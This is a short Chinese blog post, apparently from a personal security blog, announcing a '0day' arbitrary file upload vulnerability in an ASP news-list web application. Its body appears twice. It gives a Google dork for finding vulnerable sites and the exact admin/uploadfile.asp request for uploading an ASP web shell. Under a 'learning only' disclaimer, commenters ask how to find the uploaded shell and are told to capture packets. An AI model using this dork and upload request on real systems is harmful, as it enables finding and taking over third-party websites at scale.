今天呢,发布一个0day,是一个任意上传漏洞。
谷歌关键字:inurl:newslist.asp?NodeCode=
然后在域名后面添加admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp
任意上传拿shell
很吃香哦
出图测试
今天呢,发布一个0day,是一个任意上传漏洞。
谷歌关键字:inurl:newslist.asp?NodeCode=
然后在域名后面添加admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp
任意上传拿shell
很吃香哦
出图测试
阿峰
保持饥渴的专注,追求最佳的品质
COPYRIGHT © 2021 阿峰博客 阿峰'S blog. ALL RIGHTS RESERVED.
本站发布的内容仅限于学习和研究,请勿用于非法渗透和攻击,否则一切后果请自负;遵守法律法规,做一个合格的安全从业者。
文章评论
请问怎么找马地址 我的博客
@Sh1Ft2b 抓包
上传成功后的文件地址是什么?